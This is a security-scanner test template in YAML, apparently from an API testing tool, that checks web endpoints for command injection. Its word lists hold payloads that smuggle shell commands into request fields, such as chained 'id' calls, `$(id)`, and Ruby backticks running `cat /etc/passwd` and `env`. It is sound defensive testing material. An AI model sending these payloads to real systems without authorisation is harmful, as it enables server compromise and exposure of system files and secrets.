---
id: COMMAND_INJECTION_BASIC
info:
  name: "Command Injection - Basic"
  description: "Tests whether the application is vulnerable to basic command injection attacks."
  details: "This test injects basic command execution payloads (id, bash, command chaining) to check if the application executes them, indicating a command injection vulnerability."
  impact: "Command injection vulnerabilities allow attackers to execute arbitrary commands on the server, potentially leading to complete system compromise, unauthorized data access, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: COMMAND_INJECTION_BASIC
  severity: CRITICAL 
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://twitter.com/trbughunters/status/1283133356922884096"
  cwe:
    - CWE-77
    - CWE-78
  cve:
    - CVE-2023-25826
    - CVE-2023-41031

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  response_code:
    gte: 200
    lt: 300
  method:
    neq: "OPTIONS"
  response_payload:
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
  or:
    - request_payload:
        for_one:
          key:
            regex: .*
            extractMultiple: bodyKeys
          value:
            extract: bodyValue
    - query_param:
        for_one:
          key:
            regex: .*
            extractMultiple: queryKeys
          value:
            regex: .*
            extract: queryValue

wordLists:
  # Basic command injection payloads
  basicPayloads:
    - "id"
    - "id && id"
    - "id || id"
    - "id; id"
    - "id | id"
    - "bash -c 'echo command injected'"
    - "&& id"
    - "|| id"
    - "; id"
    - "| id"
    - "`id`"
    - "$(id)"
    - "id%20%26%26%20id"
  # Ruby-specific backtick payloads
  rubyBacktickPayloads:
    - "`id`"
    - "`cat /etc/passwd`"
    - "`whoami`"
    - "`uname -a`"
    - "`env`"
    - "`ls -la`"
    - "`pwd`"
    - "`id && id`"
    - "`id || id`"
    - "`id; id`"
    - "`id | id`"
    - "%60id%60"
    - "%60cat%20/etc/passwd%60"

execute:
  type: single
  requests:
    - req:
        - modify_body_param:
            ${bodyKeys}: "${basicPayloads}"
        - modify_query_param:
            ${queryKeys}: "${basicPayloads}"
    - req:
        - modify_body_param:
            ${bodyKeys}: "${rubyBacktickPayloads}"
        - modify_query_param:
            ${queryKeys}: "${rubyBacktickPayloads}"

validate:
  response_payload:
    length:
      gt: 0
    contains_all:
      - "uid="
      - "gid="
      - "groups="
    not_contains:
      - Error
      - Internal Server
      - Unauthorized
      - <html>
      - </html>
